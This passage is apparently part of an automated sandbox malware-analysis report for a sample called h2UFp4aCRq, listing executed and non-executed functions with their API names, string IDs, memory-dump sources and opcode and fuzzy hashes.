                                                                                • Opcode Fuzzy Hash: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                                                • Instruction Fuzzy Hash: E3F08C26A086C285FF248BA0E649279A6A1EB14F7CF5E4334D73C951D6CF2CDC958300
                                                                                Function 00007FF65595D94C Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                                                • Instruction ID: 77c9c218e91a656a7147f8ac84908af7a7a80d3d5969026bbaa536e58597d464
                                                                                • Opcode Fuzzy Hash: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                                                • Instruction Fuzzy Hash: D8F0345CA0A38B45FF1467A158282B412905F84FAAF0C5630D92FE62C3DF2CAEA08210
                                                                                Function 00007FF65593273C Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: File
                                                                                • String ID:
                                                                                • API String ID: 749574446-0
                                                                                • Opcode ID: 182d9e1e92039184aab4081fafd09b1cf385b4bd914a3c272b872952a66d9790
                                                                                • Instruction ID: d23fa54dbed668b034a79965c9eaa6907102fdb9bd733b31635be47b52f9391c
                                                                                • Opcode Fuzzy Hash: 182d9e1e92039184aab4081fafd09b1cf385b4bd914a3c272b872952a66d9790
                                                                                • Instruction Fuzzy Hash: 96E0CD19B14695C1EF209B7AD8555745360FF4CF88B4C1031CE0D57323CF2CDC858640
                                                                                Function 00007FF655932490 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID:
                                                                                • API String ID: 3081899298-0
                                                                                • Opcode ID: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                                                • Instruction ID: 884e9fb5e21c53bb83181b46cf09f9e7a44942cd9cd26e46e96b197917b279b2
                                                                                • Opcode Fuzzy Hash: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                                                • Instruction Fuzzy Hash: 97D0121AD09481C2DD109775989907C6390AF92F3DFA81730D63EE16E3CF1D989AA351
                                                                                Function 00007FF655937FC4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectory
                                                                                • String ID:
                                                                                • API String ID: 1611563598-0
                                                                                • Opcode ID: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                                                • Instruction ID: 9c52434b3239511d806d20b57bf1bce7950488835018de32fced2550134ed32d
                                                                                • Opcode Fuzzy Hash: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                                                • Instruction Fuzzy Hash: 95C08C28F05642C1DA085B26C8CD06813A4BB40F08B694034C50CD1120CF2CC9EE9385

                                                                                Non-executed Functions

                                                                                Function 00007FF65592C2F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 754fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastwcscpy$ControlCreateCurrentDeleteDeviceDirectoryProcessRemove
                                                                                • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                • API String ID: 2659423929-3508440684
                                                                                • Opcode ID: 8858f86e1d300f4fe6338b045563339fd6e49c025e5fe83f889019e918469e65
                                                                                • Instruction ID: da3f648610463b094aae7eeeaf80c61022b4a9feebf67f011a514cd0d5c10819
                                                                                • Opcode Fuzzy Hash: 8858f86e1d300f4fe6338b045563339fd6e49c025e5fe83f889019e918469e65
                                                                                • Instruction Fuzzy Hash: 9D62C36AF1868295FB00DB74D8482ED2361AF45BACF584231DA6DA3AD7DF3CD994C340
                                                                                Function 00007FF65593F180 Relevance: 43.2, APIs: 22, Strings: 2, Instructions: 1205COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
                                                                                • String ID: %ls$%s: %s
                                                                                • API String ID: 2539828978-2259941744
                                                                                • Opcode ID: c42e1e92abefb489ecc64538b4d900e3b2aaeb073ead6fe4ec151dab45e0a653
                                                                                • Instruction ID: 26237a6a11fcd5f55fd26e4ff3397a97dc189c21ba998a1fb90b0dcc8ea065a6
                                                                                • Opcode Fuzzy Hash: c42e1e92abefb489ecc64538b4d900e3b2aaeb073ead6fe4ec151dab45e0a653
                                                                                • Instruction Fuzzy Hash: 41B2CA66A186C2C1EA109B25D4581BE6311FFC5BD8F185236E6DDA7AE7EF2CED40C700
                                                                                Function 00007FF655962550 Relevance: 22.3, APIs: 8, Strings: 4, Instructions: 1310COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfomemcpy_s
                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                • API String ID: 1759834784-2761157908
                                                                                • Opcode ID: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
                                                                                • Instruction ID: 9d3fa332d6a194f8fbb641ca344d045172dccc86342c7e0f4661a8d6cc03af4f
                                                                                • Opcode Fuzzy Hash: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
                                                                                • Instruction Fuzzy Hash: 46B2FB7AA083C24AEB258F65D4446FD77A1FB44B8CF585135DA09A7B86DF3CED088780
                                                                                Function 00007FF655931A48 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 375fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
                                                                                • String ID: rtmp
                                                                                • API String ID: 3587137053-870060881
                                                                                • Opcode ID: e1af406d9dd90cab9ebde2dc7b257a9c18519fdc4ea1c1791790fdf5b4aa1268
                                                                                • Instruction ID: 60b5c002e37894750da0fdd33597da797db2d8a1b6c0fe13434b2aa565fe846a
                                                                                • Opcode Fuzzy Hash: e1af406d9dd90cab9ebde2dc7b257a9c18519fdc4ea1c1791790fdf5b4aa1268
                                                                                • Instruction Fuzzy Hash: 70F1C726B08AC1C1EB10DB65D8881FD6761FB85BC8F581131EA4DA7AAADF3CD984C740
                                                                                Function 00007FF655935B60 Relevance: 12.3, APIs: 8, Instructions: 256COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 1693479884-0
                                                                                • Opcode ID: 42882c5e1b64cf364603feffb0a4dffa6fd5e54fa856c7804417c031547eb997
                                                                                • Instruction ID: 0a2bde1d9e6f3fe71748b10d00118eb070e6819c07b34a1961ab8c9b0e84ddd6
                                                                                • Opcode Fuzzy Hash: 42882c5e1b64cf364603feffb0a4dffa6fd5e54fa856c7804417c031547eb997
                                                                                • Instruction Fuzzy Hash: 1BA1A366F15B9185FF108BB988481BC2361AF49FEDB594231DE2DA7BD6DF3CD8418200
                                                                                Function 00007FF655953170 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
                                                                                • Instruction ID: b2822f1bace57245d607e59872268c4960ecc3701c893c89d915474856f4c87b
                                                                                • Opcode Fuzzy Hash: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
                                                                                • Instruction Fuzzy Hash: C8318176608BC18AEB608F60E8547ED33A0FB84B48F48443ADA4D97B89DF3CD958C700
                                                                                Function 00007FF6559576D8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
                                                                                • Instruction ID: b4c87627b5ea08f98c5c55904dc6034f03a167b578a12f6fde73fea8650c05a9
                                                                                • Opcode Fuzzy Hash: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
                                                                                • Instruction Fuzzy Hash: 8831633A608BC185DB60CF25E8846EE73A4FB84B98F580135EA8D93B5ADF3CD955C700
                                                                                Function 00007FF655921AA4 Relevance: 6.3, APIs: 4, Instructions: 285COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                • Opcode ID: 206a0f393bd3dfe93c209e4185319300a1f109cb37c0a30460c8df3f59e3349e
                                                                                • Instruction ID: b1cf0f03243954faf7347cc5855fbc9da77c2892554d2a87468c1ee8944b8e6e
                                                                                • Opcode Fuzzy Hash: 206a0f393bd3dfe93c209e4185319300a1f109cb37c0a30460c8df3f59e3349e
                                                                                • Instruction Fuzzy Hash: 66B1D46AB14AC685EB109B65DC482ED2361FF85BC8F581231EA5DA3B9BDF3CD950C300
                                                                                Function 00007FF65595FA94 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FF65595FAC4
                                                                                  • Part of subcall function 00007FF655957934: GetCurrentProcess.KERNEL32(00007FF655960CCD), ref: 00007FF655957961
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                • String ID: *?$.
                                                                                • API String ID: 2518042432-3972193922
                                                                                • Opcode ID: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                                                                • Instruction ID: 8bf8e3e30de6ff4b54f8ff861d994a3a7cad1273bd42eb4b1889d9c9e34333ca
                                                                                • Opcode Fuzzy Hash: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                                                                • Instruction Fuzzy Hash: ED51C2AAB15B9581EB10DFA194184B963A4FF48FE8B484531DE5DA7B86DF3CD8528300
                                                                                Function 00007FF655962080 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy_s
                                                                                • String ID:
                                                                                • API String ID: 1502251526-0
                                                                                • Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                                • Instruction ID: 48acab48538c02f17cc16373e0155e43005b1025a1b8b952cbc17a79477a46fa
                                                                                • Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                                • Instruction Fuzzy Hash: B5D19236B183C687DB34CF55A18866AB791F798B88F188134DB4AA7B45DF3CEC458B40
                                                                                Function 00007FF65592B6D8 Relevance: 4.5, APIs: 3, Instructions: 36windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFormatFreeLastLocalMessage
                                                                                • String ID:
                                                                                • API String ID: 1365068426-0
                                                                                • Opcode ID: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
                                                                                • Instruction ID: 4a2e0b16f3599e660e43bd02cdac6ea0c5852d95b40c0d3cbe2f53418526cef7
                                                                                • Opcode Fuzzy Hash: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
                                                                                • Instruction Fuzzy Hash: 9601177960C78182D7109F52B8541BE63A5FB89FC5F4C4034DA8D97B46CF3CD9158740
                                                                                Function 00007FF65595FCA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .
                                                                                • API String ID: 0-248832578
                                                                                • Opcode ID: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
                                                                                • Instruction ID: d499d07d1097564cc16894cf5794069b4fb90fabe82ba965286401bd74671c51
                                                                                • Opcode Fuzzy Hash: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
                                                                                • Instruction Fuzzy Hash: BF310866B186D145EB209B36E8087A96A91AF94FF8F188235DE5C97BC7CF3CD9158300
                                                                                Function 00007FF655965AF8 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
